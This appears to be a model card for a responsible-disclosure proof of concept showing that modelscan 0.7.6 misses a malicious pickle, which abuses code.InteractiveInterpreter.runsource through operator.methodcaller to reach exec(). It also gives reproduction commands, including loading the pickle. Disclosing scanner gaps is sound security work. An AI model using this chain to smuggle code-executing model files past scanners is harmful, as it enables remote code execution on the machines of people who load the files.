metadata
license: mit
tags:
- security-research
- modelscan-bypass
- pickle-safety
modelscan-bypass-code-interpreter
Modelscan Bypass PoC — code.InteractiveInterpreter
Severity: CRITICAL Impact: Full RCE via exec() — code.InteractiveInterpreter.runsource() calls exec() on arbitrary Python code modelscan version: 0.7.6 (latest on PyPI) Result: "No issues found!" ✅ (false negative)
Chain
code.InteractiveInterpreter() → operator.methodcaller("runsource", malicious_code) → exec(malicious_code)
Why It Works
code.InteractiveInterpreter is NOT in modelscan's unsafe_globals blocklist.
Neither code module nor operator.methodcaller are blocked.
Reproduction
pip install modelscan
modelscan scan -p bypass_poc.pkl
# Output: "No issues found!"
python3 -c "import pickle; pickle.loads(open('bypass_poc.pkl','rb').read())"
# Executes arbitrary code
Responsible Disclosure
This PoC is part of a responsible disclosure to ProtectAI via Huntr MFV program.